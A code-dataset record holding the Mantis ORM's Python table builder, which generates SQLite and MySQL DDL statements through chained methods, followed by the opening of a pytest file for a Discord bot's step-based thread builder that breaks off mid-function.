hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4bea7c7ad719970460f34be3e835a7e5e53c57d0
| 32,305
|
py
|
Python
|
mantis/builders/tablebuilder.py
|
Clivern/Mantis
|
5f80ef49d7e25b9368513bb059c4c3e712e87346
|
[
"MIT"
] | 2
|
2015-12-17T23:32:12.000Z
|
2016-04-16T12:49:01.000Z
|
mantis/builders/tablebuilder.py
|
Clivern/Mantis
|
5f80ef49d7e25b9368513bb059c4c3e712e87346
|
[
"MIT"
] | 1
|
2017-01-17T15:58:12.000Z
|
2017-01-17T15:58:12.000Z
|
mantis/builders/tablebuilder.py
|
Clivern/Mantis
|
5f80ef49d7e25b9368513bb059c4c3e712e87346
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Mantis
~~~~~~
A Minimalist ORM for Python
:copyright: (c) 2016 by Clivern (hello@clivern.com).
:license: MIT, see LICENSE for more details.
"""
from __future__ import print_function
class SQLiteTableBuilder(object):
"""SQLite Table Builder"""
# Table name
_table = None
# A list of columns to create
_columns = []
# A list of commands to execute
_commands = []
# End Query to run
_query = ""
# Temp return values used to support chaining
_temp = None
# Query logger
_logger = None
def set_logger(self, logger):
"""Set logger"""
self._logger = logger
def create_table(self, table_name):
"""Create a new table in database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add command
self._add_command({
'type': 'create_table',
'table_name': table_name
})
return self
def create_table_if_not_exists(self, table_name):
"""Create a new table in database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add command
self._add_command({
'type': 'create_table_if_not_exists',
'table_name': table_name
})
return self
def alter_table(self, table_name):
"""Alter table in database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add command
self._add_command({
'type': 'alter_table',
'table_name': table_name
})
return self
def drop_table(self, table_name):
"""Drop table from database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'drop_table',
'table_name': table_name
})
return self
def drop_table_if_exists(self, table_name):
"""Drop table if exists from database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'drop_table_if_exists',
'table_name': table_name
})
return self
def rename_table(self, from_name, to_name):
"""Rename table"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'rename_table',
'from_table_name': from_name,
'to_table_name': to_name
})
return self
def text(self, column_name):
"""Add text column"""
self._temp = [self._add_column(column_name, {
'type': 'TEXT',
})]
return self
def numeric(self, column_name):
"""Add numeric column"""
self._temp = [self._add_column(column_name, {
'type': 'NUMERIC',
})]
return self
def integer(self, column_name):
"""Add integer column"""
self._temp = [self._add_column(column_name, {
'type': 'INTEGER',
})]
return self
def real(self, column_name):
"""Add real column"""
self._temp = [self._add_column(column_name, {
'type': 'REAL',
})]
return self
def blob(self, column_name):
"""Add blob column"""
self._temp = [self._add_column(column_name, {
'type': 'BLOB',
})]
return self
def null(self, column_name):
"""Add null column"""
self._temp = [self._add_column(column_name, {
'type': 'NULL',
})]
return self
def add(self):
"""Add a new column"""
for _temp in self._temp:
self._columns[_temp]['parameters']['add'] = True
return self
def get(self):
"""Get Query from columns and commands"""
self._translate()
return False if(self._query == '') else self._query
def reset(self, type=['table', 'columns', 'commands', 'query']):
""" Reset columns and commands"""
# Check to reset table
if 'table' in type:
self._table = None
# Check to reset columns
if 'columns' in type:
self._columns = []
# Check to reset commands
if 'commands' in type:
self._commands = []
# Check to reset query
if 'query' in type:
self._query = ""
return self
def _add_command(self, command):
"""Add commands storage"""
self._commands.append(command)
return len(self._commands) - 1
def _add_column(self, column_name, parameters):
"""Add columns storage"""
self._columns.append({
'column_name': column_name,
'parameters': parameters
})
return len(self._columns) - 1
def _translate(self):
""" Translate columns and commands to Query"""
# Check for current flow
if (len(self._columns) > 0) and (len(self._commands) > 0):
# Translate create table command
self._translate_columns()
elif (len(self._commands) > 0):
# Translate other commands
self._translate_commands()
# Invalid result reached
else:
return False
def _translate_columns(self):
"""Translate table creation command"""
for command in self._commands:
# Check if command is create table
if command['type'] == 'create_table':
return self._translate_create_table(command)
# Check if command is alter table
elif command['type'] == 'alter_table':
return self._translate_alter_table(command)
# Check if logger is availabe
if self._logger is not None:
self._logger.log(self._query)
return True
def _translate_commands(self):
"""Translate custom commands"""
self._query = ""
# Loop through commands
for command in self._commands:
# Check if `drop table if exists` command
if command['type'] == 'drop_table_if_exists':
self._query += "DROP TABLE IF EXISTS %s" % (command['table_name'])
# Check if `drop table` command
elif command['type'] == 'drop_table':
self._query += "DROP TABLE %s" % (command['table_name'])
# Check if `rename table` command
elif command['type'] == 'rename_table':
self._query += "ALTER TABLE %s RENAME TO %s" % (command['from_table_name'], command['to_table_name'])
# Invalid result reached
else:
return False
# Check if logger is availabe
if self._logger is not None:
self._logger.log(self._query)
return True
def _translate_create_table(self, command):
"""Translate create table command"""
# Build create table command
if (command['type'] == 'create_table') and (command['table_name'] != ''):
self._query = 'CREATE TABLE %s (\n ' % (command['table_name'])
# Build create table if not exists command
elif (command['type'] == 'create_table_if_not_exists') and (command['table_name'] != ''):
self._query = 'CREATE TABLE IF NOT EXISTS %s (\n ' % (command['table_name'])
# Invalid result reached
else:
return False
# Internal data
nice_column = []
# Check if no columns set
if len(self._columns) <= 0:
return False
# Loop through columns
for column in self._columns:
# Append column end command
nice_column.append("%s %s" % (column['column_name'], column['parameters']['type']))
# check if commands empty
if len(nice_column) <= 0:
return False
# append commands to the final query
self._query += ",\n ".join(nice_column)
# End Query
self._query += '\n)'
def _translate_alter_table(self, command):
"""Translate alter table command"""
# Loop through columns
nice_column = []
for column in self._columns:
# Append column end command
nice_column.append('ALTER TABLE %s ADD COLUMN %s %s' % (command['table_name'], column['column_name'], column['parameters']['type']))
# append commands to the final query
self._query += "\n".join(nice_column)
class MySQLTableBuilder(object):
"""MySQL Table Builder"""
# Table name
_table = None
# A list of columns to create
_columns = []
# A list of commands to execute
_commands = []
# Default engine
_engine = "InnoDB"
# Default charset
_charset = "utf8"
# Default collation
_collation = "utf8_general_ci"
# End Query to run
_query = ""
# Temp return values used to support chaining
_temp = None
# Query logger
_logger = None
def set_engine(self, engine):
"""Set engine"""
self._engine = engine
def set_charset(self, charset):
"""Set charset"""
self._charset = charset
def set_collation(self, collation):
"""Set collation"""
self._collation = collation
def set_logger(self, logger):
"""Set logger"""
self._logger = logger
def create_table(self, table_name):
"""Create a new table in database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add command
self._add_command({
'type': 'create_table',
'table_name': table_name
})
return self
def create_table_if_not_exists(self, table_name):
"""Create a new table in database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add command
self._add_command({
'type': 'create_table_if_not_exists',
'table_name': table_name
})
return self
def alter_table(self, table_name):
"""Alter table in database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add command
self._add_command({
'type': 'alter_table',
'table_name': table_name
})
return self
def drop_table(self, table_name):
"""Drop table from database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'drop_table',
'table_name': table_name
})
return self
def drop_table_if_exists(self, table_name):
"""Drop table if exists from database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'drop_table_if_exists',
'table_name': table_name
})
return self
def rename_table(self, from_name, to_name):
"""Rename table"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'rename_table',
'from_table_name': from_name,
'to_table_name': to_name
})
return self
def has_table(self, table_name):
"""Check if table exist in database"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'has_table',
'table_name': table_name
})
return self
def has_column(self, table_name, column_name):
"""Check if column exist in table"""
# Reset table, columns and commands
self.reset(['table', 'columns', 'commands', 'query'])
# Add Command
self._add_command({
'type': 'has_column',
'table_name': table_name,
'column_name': column_name
})
return self
def big_increments(self, column_name, length=20):
"""Add big auto increments column"""
length = length if(length <= 20) else 20
self._temp = [self._add_column(column_name, {
'type': 'INT(%s)' % (length),
'length': length,
'null': False,
'auto_increment': True,
'primary': True
})]
return self
def increments(self, column_name, length=11):
"""Add auto increments column"""
length = length if(length <= 11) else 11
self._temp = [self._add_column(column_name, {
'type': 'INT(%s)' % (length),
'length': length,
'null': False,
'auto_increment': True,
'primary': True
})]
return self
def big_integer(self, column_name, length=20):
"""Add big integer column"""
length = length if(length <= 20) else 20
self._temp = [self._add_column(column_name, {
'type': 'BIGINT(%s)' % (length),
'length': length,
'null': False
})]
return self
def integer(self, column_name, length=11):
"""Add integer column"""
length = length if(length <= 11) else 11
self._temp = [self._add_column(column_name, {
'type': 'INT(%s)' % (length),
'length': length,
'null': False
})]
return self
def medium_integer(self, column_name, length=9):
"""Add medium integer column"""
length = length if(length <= 9) else 9
self._temp = [self._add_column(column_name, {
'type': 'MEDIUMINT(%s)' % (length),
'length': length,
'null': False
})]
return self
def small_integer(self, column_name, length=6):
"""Add small integer column"""
length = length if(length <= 6) else 6
self._temp = [self._add_column(column_name, {
'type': 'SMALLINT(%s)' % (length),
'length': length,
'null': False
})]
return self
def tiny_integer(self, column_name, length=4):
"""Add tiny integer column"""
length = length if(length <= 4) else 4
self._temp = [self._add_column(column_name, {
'type': 'TINYINT(%s)' % (length),
'length': length,
'null': False
})]
return self
def binary(self, column_name, length=255):
"""Add binary column"""
length = length if(length <= 255) else 255
self._temp = [self._add_column(column_name, {
'type': 'BINARY(%s)' % (length),
'length': length,
'null': False
})]
return self
def boolean(self, column_name):
"""Add boolean column"""
self._temp = [self._add_column(column_name, {
'type': 'BOOLEAN',
'null': False
})]
return self
def string(self, column_name, length=250):
"""Add varchar column"""
length = length if(length <= 250) else 250
self._temp = [self._add_column(column_name, {
'type': 'VARCHAR(%s)' % (length),
'length': length,
'null': False
})]
return self
def varchar(self, column_name, length=250):
"""Add varchar column"""
length = length if(length <= 250) else 250
self._temp = [self._add_column(column_name, {
'type': 'VARCHAR(%s)' % (length),
'length': length,
'null': False
})]
return self
def char(self, column_name, length=255):
"""Add char column"""
length = length if(length <= 255) else 255
self._temp = [self._add_column(column_name, {
'type': 'CHAR(%s)' % (length),
'length': length,
'null': False
})]
return self
def decimal(self, column_name, length, decimals):
"""Add decimal column"""
self._temp = [self._add_column(column_name, {
'type': 'DECIMAL(%s,%s)' % (length, decimals),
'length': length,
'decimals': decimals,
'null': False
})]
return self
def double(self, column_name, length, decimals):
"""Add double column"""
self._temp = [self._add_column(column_name, {
'type': 'DOUBLE(%s,%s)' % (length, decimals),
'length': length,
'decimals': decimals,
'null': False
})]
return self
def enum(self, column_name, choices=[]):
"""Add enum column"""
self._temp = [self._add_column(column_name, {
'type': "ENUM('%s')" % "','".join(choices),
'choices': choices,
'null': False
})]
return self
def float(self, column_name, length, decimals):
"""Add float column"""
self._temp = [self._add_column(column_name, {
'type': 'FLOAT(%s,%s)' % (length, decimals),
'length': length,
'decimals': decimals,
'null': False
})]
return self
def long_blob(self, column_name):
"""Add long blob column"""
self._temp = [self._add_column(column_name, {
'type': 'LONGBLOB',
'null': False
})]
return self
def medium_blob(self, column_name):
"""Add medium blob column"""
self._temp = [self._add_column(column_name, {
'type': 'MEDIUMBLOB',
'null': False
})]
return self
def tiny_blob(self, column_name):
"""Add tiny blob column"""
self._temp = [self._add_column(column_name, {
'type': 'TINYBLOB',
'null': False
})]
return self
def blob(self, column_name):
"""Add blob column"""
self._temp = [self._add_column(column_name, {
'type': 'BLOB',
'null': False
})]
return self
def long_text(self, column_name):
"""Add long text column"""
self._temp = [self._add_column(column_name, {
'type': 'LONGTEXT',
'null': False
})]
return self
def medium_text(self, column_name):
"""Add medium text column"""
self._temp = [self._add_column(column_name, {
'type': 'MEDIUMTEXT',
'null': False
})]
return self
def tiny_text(self, column_name):
"""Add tiny text column"""
self._temp = [self._add_column(column_name, {
'type': 'TINYTEXT',
'null': False
})]
return self
def text(self, column_name):
"""Add text column"""
self._temp = [self._add_column(column_name, {
'type': 'TEXT',
'null': False
})]
return self
def time(self, column_name):
"""Add time column"""
self._temp = [self._add_column(column_name, {
'type': 'TIME',
'null': False
})]
return self
def year(self, column_name, length=4):
"""Add year column"""
length = length if((length == 4) or (length == 2)) else 4
self._temp = [self._add_column(column_name, {
'type': 'YEAR(%s)' % (length),
'length': length,
'null': False
})]
return self
def datetime(self, column_name):
"""Add datetime column"""
self._temp = [self._add_column(column_name, {
'type': 'DATETIME',
'null': False
})]
return self
def date(self, column_name):
"""Add date column"""
self._temp = [self._add_column(column_name, {
'type': 'DATE',
'null': False
})]
return self
def timestamp(self, column_name):
"""Add timestamp column"""
self._temp = [self._add_column(column_name, {
'type': 'TIMESTAMP',
'null': False
})]
return self
def timestamps(self):
"""Add 'created_at' and 'updated_at' timestamps columns"""
self._temp = [self._add_column('created_at', {
'type': 'TIMESTAMP',
'null': False
}), self._add_column('updated_at', {
'type': 'TIMESTAMP',
'null': False
})]
return self
def nullable_timestamps(self):
"""Add nullable 'created_at' and 'updated_at' timestamps columns"""
self._temp = [self._add_column('created_at', {
'type': 'TIMESTAMP',
'null': True
}), self._add_column('updated_at', {
'type': 'TIMESTAMP',
'null': True
})]
return self
def nullable(self):
"""Mark column as nullable"""
for _temp in self._temp:
self._columns[_temp]['parameters']['null'] = True
return self
def not_nullable(self):
"""Mark column as not nullable"""
for _temp in self._temp:
self._columns[_temp]['parameters']['null'] = False
return self
def null(self):
"""Mark column as nullable"""
for _temp in self._temp:
self._columns[_temp]['parameters']['null'] = True
return self
def not_null(self):
"""Mark column as not nullable"""
for _temp in self._temp:
self._columns[_temp]['parameters']['null'] = False
return self
def auto_increment(self):
"""Mark column as auto incremented"""
for _temp in self._temp:
self._columns[_temp]['parameters']['auto_increment'] = True
self._columns[_temp]['parameters']['primary'] = True
return self
def primary(self):
"""Mark column as index"""
for _temp in self._temp:
self._columns[_temp]['parameters']['primary'] = True
return self
def index(self):
"""Mark column as index"""
for _temp in self._temp:
self._columns[_temp]['parameters']['index'] = True
return self
def key(self):
"""Mark column as index"""
for _temp in self._temp:
self._columns[_temp]['parameters']['index'] = True
return self
def default(self, default_value):
"""Add default value to the column"""
for _temp in self._temp:
self._columns[_temp]['parameters']['default'] = default_value
return self
def add(self):
"""Add a new column"""
for _temp in self._temp:
self._columns[_temp]['parameters']['add'] = True
return self
def modify(self):
"""Modify column"""
for _temp in self._temp:
self._columns[_temp]['parameters']['modify'] = True
return self
def drop(self):
"""Drop column"""
for _temp in self._temp:
self._columns[_temp]['parameters']['drop'] = True
return self
def get(self):
"""Get Query from columns and commands"""
self._translate()
return False if(self._query == '') else self._query
def reset(self, type=['table', 'columns', 'commands', 'engine', 'charset', 'collation', 'query']):
""" Reset columns and commands"""
# Check to reset table
if 'table' in type:
self._table = None
# Check to reset columns
if 'columns' in type:
self._columns = []
# Check to reset commands
if 'commands' in type:
self._commands = []
# Check to reset engine
if 'engine' in type:
self._engine = "InnoDB"
# Check to reset charset
if 'charset' in type:
self._charset = "utf8"
# Check to reset collation
if 'collation' in type:
self._collation = "utf8_general_ci"
# Check to reset query
if 'query' in type:
self._query = ""
return self
def _add_command(self, command):
"""Add commands storage"""
self._commands.append(command)
return len(self._commands) - 1
def _add_column(self, column_name, parameters):
"""Add columns storage"""
self._columns.append({
'column_name': column_name,
'parameters': parameters
})
return len(self._columns) - 1
def _translate(self):
""" Translate columns and commands to Query"""
# Check for current flow
if (len(self._columns) > 0) and (len(self._commands) > 0):
# Translate create table command
self._translate_columns()
elif (len(self._commands) > 0):
# Translate other commands
self._translate_commands()
# Invalid result reached
else:
return False
def _translate_columns(self):
"""Translate table creation command"""
for command in self._commands:
# Check if command is create table
if command['type'] == 'create_table':
return self._translate_create_table(command)
# Check if command is alter table
elif command['type'] == 'alter_table':
return self._translate_alter_table(command)
# Check if logger is availabe
if self._logger is not None:
self._logger.log(self._query)
return True
def _translate_commands(self):
"""Translate custom commands"""
self._query = ""
# Loop through commands
for command in self._commands:
# Check if `drop table if exists` command
if command['type'] == 'drop_table_if_exists':
self._query += "DROP TABLE IF EXISTS `%s`" % (command['table_name'])
# Check if `drop table` command
elif command['type'] == 'drop_table':
self._query += "DROP TABLE `%s`" % (command['table_name'])
# Check if `rename table` command
elif command['type'] == 'rename_table':
self._query += "RENAME TABLE %s TO %s" % (command['from_table_name'], command['to_table_name'])
# Check if `has column` command
elif command['type'] == 'has_column':
self._query += "SHOW COLUMNS FROM `%s` LIKE '%s'" % (command['table_name'], command['column_name'])
# Check if `has table` command
elif command['type'] == 'has_table':
self._query += "SHOW TABLES LIKE '%s'" % (command['table_name'])
# Invalid result reached
else:
return False
# Check if logger is availabe
if self._logger is not None:
self._logger.log(self._query)
return True
def _translate_create_table(self, command):
"""Translate create table command"""
# Build create table command
if (command['type'] == 'create_table') and (command['table_name'] != ''):
self._query = 'CREATE TABLE `%s` (\n ' % (command['table_name'])
# Build create table if not exists command
elif (command['type'] == 'create_table_if_not_exists') and (command['table_name'] != ''):
self._query = 'CREATE TABLE IF NOT EXISTS `%s` (\n ' % (command['table_name'])
# Invalid result reached
else:
return False
# Internal data
nice_column = []
nice_commands = []
auto_increment_indicator = ""
# Check if no columns set
if len(self._columns) <= 0:
return False
auto_increment_indicator = ""
# Loop through columns
for column in self._columns:
attrs = ""
# Check if column not null or null
if ('null' in column['parameters']) and (not column['parameters']['null']):
attrs += " NOT NULL"
else:
attrs += " NULL"
# Check for auto increment
if ('auto_increment' in column['parameters']) and (column['parameters']['auto_increment']):
attrs += " AUTO_INCREMENT"
auto_increment_indicator = " AUTO_INCREMENT=1"
# Check for default value
if ('default' in column['parameters']) and (column['parameters']['default'] != ""):
attrs += " DEFAULT '%s'" % (column['parameters']['default'])
# Append column end command
nice_column.append("`%s` %s%s" % (column['column_name'], column['parameters']['type'], attrs))
# Check if column in primary key
if ('primary' in column['parameters']) and (column['parameters']['primary']):
nice_commands.append("PRIMARY KEY (`%s`)" % (column['column_name']))
# Check if column is index
if ('index' in column['parameters']) and (column['parameters']['index']):
nice_commands.append("KEY `%s` (`%s`)" % (column['column_name'], column['column_name']))
# Concatenate all commands
all_commands = nice_column + nice_commands
# check if commands empty
if len(all_commands) <= 0:
return False
# append commands to the final query
self._query += ",\n ".join(all_commands)
# Set engine and charset
if ((command['type'] == 'create_table_if_not_exists') or (command['type'] == 'create_table')) and (command['table_name'] != ''):
self._query += '\n) ENGINE=%s DEFAULT CHARSET=%s%s' % (self._engine, self._charset, auto_increment_indicator)
# Invalid result reached
else:
return False
def _translate_alter_table(self, command):
"""Translate alter table command"""
# Build Alter table command
if (command['type'] == 'alter_table') and (command['table_name'] != ''):
self._query = 'ALTER TABLE %s\n' % (command['table_name'])
# Loop through columns
nice_column = []
for column in self._columns:
attrs = ""
action_type = "ADD"
# Check if action is add
if ('add' in column['parameters']) and (column['parameters']['add']):
action_type = "ADD"
# Check if action is modify
elif ('modify' in column['parameters']) and (column['parameters']['modify']):
action_type = "MODIFY"
# Check if action is drop
elif ('drop' in column['parameters']) and (column['parameters']['drop']):
action_type = "DROP"
# Set default
else:
action_type = "ADD"
# Check if column not null or null
if ('null' in column['parameters']) and (not column['parameters']['null']) and (action_type != 'DROP'):
attrs += " NOT NULL"
elif (action_type != 'DROP'):
attrs += " NULL"
# Check for auto increment
if ('auto_increment' in column['parameters']) and (column['parameters']['auto_increment']) and (action_type != 'DROP'):
attrs += " AUTO_INCREMENT"
# Check for default value
if ('default' in column['parameters']) and (column['parameters']['default'] != "") and (action_type != 'DROP'):
attrs += " DEFAULT '%s'" % (column['parameters']['default'])
# Append column end command
nice_column.append('%s %s %s%s' % (action_type, column['column_name'], column['parameters']['type'], attrs))
# append commands to the final query
self._query += "\n".join(nice_column)
class PostgreSQLTableBuilder(object):
"""PostgreSQL Table Builder"""
pass
| 30.419021
| 144
| 0.539359
| 3,485
| 32,305
| 4.806026
| 0.05538
| 0.051943
| 0.051227
| 0.033136
| 0.855872
| 0.813302
| 0.762792
| 0.741537
| 0.7207
| 0.663562
| 0
| 0.004503
| 0.33323
| 32,305
| 1,061
| 145
| 30.447691
| 0.773073
| 0.166104
| 0
| 0.761755
| 0
| 0
| 0.144072
| 0.004937
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0.001567
| 0.001567
| 0
| 0.308777
| 0.001567
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
324497a8df6b275aeaa31e93f2b6f12a21e1c551
| 16,625
|
py
|
Python
|
tests/common/threads/test_thread_builder.py
|
alexkeating/KevinMalone
|
4dd7fe45c7d0190e2708a74521c40244dd452743
|
[
"MIT"
] | null | null | null |
tests/common/threads/test_thread_builder.py
|
alexkeating/KevinMalone
|
4dd7fe45c7d0190e2708a74521c40244dd452743
|
[
"MIT"
] | 6
|
2021-12-15T22:23:33.000Z
|
2022-03-30T19:55:14.000Z
|
tests/common/threads/test_thread_builder.py
|
alexkeating/KevinMalone
|
4dd7fe45c7d0190e2708a74521c40244dd452743
|
[
"MIT"
] | 6
|
2021-11-10T20:56:20.000Z
|
2021-12-21T16:55:11.000Z
|
import pytest
import hashlib
import json
from bot.common.threads.thread_builder import BaseThread, Step, BaseStep, StepKeys
from tests.test_utils import MockCache
from unittest.mock import MagicMock, AsyncMock
class EmojiLogic(BaseStep):
emoji = True
async def handle_emoji(self, raw_reaction):
pass
async def save(self, message, guild_id, user_id):
pass
class RedLogic(BaseStep):
name = "red"
async def send(self, message, user_id):
pass
class BlueLogic(BaseStep):
name = "blue"
async def send(self, message, user_id):
pass
class LeftLogic(BaseStep):
name = "left"
async def send(self, message, user_id):
pass
class RightLogic(BaseStep):
name = "right"
async def send(self, message, user_id):
pass
class MockLogic(BaseStep):
name = "mock_logic"
async def send(self, message, user_id):
pass
class SingleThread(BaseThread):
async def get_steps(self):
return Step(current=MockLogic())
class MultiThread(BaseThread):
async def get_steps(self):
return (
Step(current=MockLogic())
.add_next_step(MockLogic())
.add_next_step(MockLogic())
.build()
)
class SingleForkThread(BaseThread):
async def get_steps(self):
left = LeftLogic()
right = RightLogic()
return (
Step(current=MockLogic())
.add_next_step(MockLogic())
.fork([left, right])
.build()
)
class MultiForkThread(BaseThread):
async def get_steps(self):
red = RedLogic()
blue = BlueLogic()
left = Step(current=LeftLogic()).fork([red, blue]).build()
right = Step(current=RightLogic()).add_next_step(left).build()
return (
Step(current=MockLogic())
.add_next_step(MockLogic())
.fork([left, right])
.build()
)
class EmojiThread(BaseThread):
async def get_steps(self):
return Step(current=EmojiLogic)
def get_root_hash():
return hashlib.sha256("".encode()).hexdigest()
# Test find step #
@pytest.mark.asyncio
async def test_find_single_step():
"""
Find a step in a thread with a single step
"""
root_hash = get_root_hash()
steps = await SingleThread(
user_id="", current_step=root_hash, message_id="", guild_id=""
).get_steps()
step = SingleThread.find_step(steps, root_hash)
assert step.hash_ == root_hash
@pytest.mark.asyncio
async def test_find_mulitple_step_no_forks():
"""
Find a step in a thread with no forks and multiple steps
"""
root_hash = get_root_hash()
steps = await MultiThread(
user_id="", current_step=root_hash, message_id="", guild_id=""
).get_steps()
third_step = steps.get_next_step(MockLogic.name).get_next_step(MockLogic.name)
step = SingleThread.find_step(steps, third_step.hash_)
assert step.hash_ == third_step.hash_
@pytest.mark.asyncio
async def test_find_mulitple_step_single_fork():
"""
Find a step in a thread with with a single fork
"""
root_hash = get_root_hash()
steps = await SingleForkThread(
user_id="", current_step=root_hash, message_id="", guild_id=""
).get_steps()
right_step = steps.get_next_step(MockLogic.name).get_next_step(RightLogic.name)
step = SingleForkThread.find_step(steps, right_step.hash_)
assert step.hash_ == right_step.hash_
@pytest.mark.asyncio
async def test_find_mulitple_step_multiple_fork():
"""
Find a step in a thread with multiple forks
"""
root_hash = get_root_hash()
steps = await MultiForkThread(
user_id="", current_step=root_hash, message_id="", guild_id=""
).get_steps()
blue_step = (
steps.get_next_step(MockLogic.name)
.get_next_step(RightLogic.name)
.get_next_step(LeftLogic.name)
.get_next_step(BlueLogic.name)
)
step = MultiForkThread.find_step(steps, blue_step.hash_)
assert step.hash_ == blue_step.hash_
# Test Thread __await__ #
@pytest.mark.asyncio
async def test_thread_steps():
root_hash = get_root_hash()
thread = await MultiForkThread(
